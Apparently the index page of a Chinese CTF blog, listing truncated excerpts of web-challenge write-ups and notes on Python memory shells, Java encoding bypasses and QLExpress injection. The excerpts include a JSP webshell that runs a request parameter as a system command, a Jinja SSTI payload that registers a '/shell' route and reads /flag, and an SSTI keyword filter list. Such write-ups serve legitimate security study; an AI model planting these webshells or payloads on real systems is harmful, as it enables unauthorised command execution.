A day in AsaL1n

2024 强网杯 web 最近有点忙 比赛题目好多都没复现 欸 最后做题情况如下 php platform给了源代码 1234567891011121314151617181920212223242526<?phpsession_start();require 'user.php';require 'class.php';$sessionManager = new SessionManager();$SessionRandom = new SessionRandom();if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $password = $_POST['password']; $_SESSION['user'] = $username; if (!isset($_SESSION[' ...

2024浙江省省赛 web初赛 这次比赛题目还是比较简单的 我上来就拿了两个血 可惜第三题使用xml加载内存马的时候 脑袋抽了没想出来 可惜了 最后第11名 欸可惜 easyjs 点名了存在原型链污染 污染id=1 的isAdmin为true就行 得到flag 这题不污染也行 乐 hack memory不知道应该干啥 扫一下 直接上传一句话就行 12345678910<% if("poc".equals(request.getParameter("pwd"))){java.io.InputStream in =Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1; byte[] b = new byte[2048]; out.print("<pre>");while((a=in.read(b))!=-1){out.println(new St ...

2024强网拟态 web 我们A1natas最后获得了第30 感觉没希望进线下了 尽力了 不过开心的是我ak了web方向的题目 ez_picker/register存在原型链污染 可以污染任意的黑白名单 这里在register的时候 进行了merge操作 写个简单的demo 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960import sanicfrom sanic import text, Sanic, Request, responsefrom key import secret_keyapp = Sanic("test")users=[]safe_modules = { 'math', 'datetime', 'json', 'collections'
...

一些python rce利用&&内存马 有的时候会遇到 能ssti注入或者直接执行任意命令了 但是不出网同时没有回显 这个时候需要进一步操作的时候就比较麻烦 python内存马也不是一个很常见的东西 所以今天想着学习一下能任意命令执行的利用手段和内存马 flaskstatic_folder 任意文件读取flask在初始化的时候 会设置很多内部的属性 1234567891011121314151617181920def __init__( self, import_name: str, static_url_path: str | None = None, static_folder: str | os.PathLike | None = "static", static_host: str | None = None, host_matching: bool = False, subdomain_matching: bool = False, ...

Java 编码绕过 上午台州市赛web做完闲逛的时候看到的 学习一下 UTF-8 Overlong Encodingutf-8可以将unicode的字符 通过某种计算转化成1-4位的字符 转化的逻辑如下 123456(十六进制) | （二进制）--------------------+---------------------------------------------0000 0000-0000 007F | 0xxxxxxx0000 0080-0000 07FF | 110xxxxx 10xxxxxx0000 0800-0000 FFFF | 1110xxxx 10xxxxxx 10xxxxxx0001 0000-0010 FFFF | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx 这样 通过更长的编码长度 可以表示不同的字符 在java反序列化的过程中 也体现了这一点 在ObjectinputStream#readUTFSpan中会把buf中的内容解码出utf-8编码的字符 调用栈如下 可以看到这里写出了不同情况下的处理方式 一字节的字符 ...

2024SCTF 好多没复现 水一下罢了 比赛的时候就做出了两道题 哭（QAQ） ezRender在admin路由 存在ssti注入 但是这里要过一个waf和一个身份验证 先来看waf 123456789101112131415161718192021222324252627282930313233343536373839evilcode=[ "{%", "config", "session", "request", "self", "url_for", "current_app", "get_flashed_messages", "lipsum", "cycler", " ...

2024Bytectf 这次比赛 我们A1natas排名第17 可惜了没能进入决赛 就差一点 最近p事情太多了 又忙newstar又忙其他的 现在才有时间复现 写博客 ezobj（复现）给了源代码 1234567891011121314151617181920<?phpini_set("display_errors", "On");include_once("config.php");if (isset($_GET['so']) && isset($_GET['key'])) { if (is_numeric($_GET['so']) && $_GET['key'] === $secret) { array_map(function($file) { echo $file . "\n"; }, glob('/tmp/ ...

QL表达式注入依赖12345<dependency> <groupId>com.alibaba</groupId> <artifactId>QLExpress</artifactId> <version>3.3.2</version></dependency> 来自https://github.com/alibaba/QLExpress 使用123456789101112131415161718192021222324252627282930变量：使用$符号加上变量名的方式来引用变量，例如$age表示引用变量age的值。常量：支持整数、浮点数、字符串、布尔值、空值等常量类型，例如1、2.5、"hello"、true、null等。算术表达式：支持加减乘除、取余、取反等算术运算，例如1+2、3*4、-5等。逻辑表达式：支持与、或、非等逻辑运算，例如true && false、true || false、!true等。比较表达式：支持等于、不等于、大于、 ...

2024羊城杯 web这次比赛 在大家的努力下 我们A1natas最后排名第三 我也是成功的在晚上12点左右 侥幸ak了web 这次比赛被我非预期了好几题 笑死 Lyrics For You存在任意文件读取 可以读取config.key config.py等等 key的值是 1secret_code = "EnjoyThePlayTime123456" 存在pickle反序列化 直接伪造cookies就行 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768import osimport randomfrom flask import Flask, make_response, request, render_template# from cookie import set_cookie, cookie_check, get_cookieimport p ...

2024 巅峰极客初赛 web 感谢A1natas的小伙伴 这次我们A1natas 获得了第19名 决赛见 EncirclingGame签到 直接玩游戏就行 队友玩了会就穿了 GoldenHornKing贴一下payload 1lipsum.__globals__['__builtins__']['eval']("app.add_api_route('/shell',lambda:result ,methods=['GET'])",{'app':app,'result':lipsum.__globals__.get("os").popen("cat /flag").read()}) 源代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...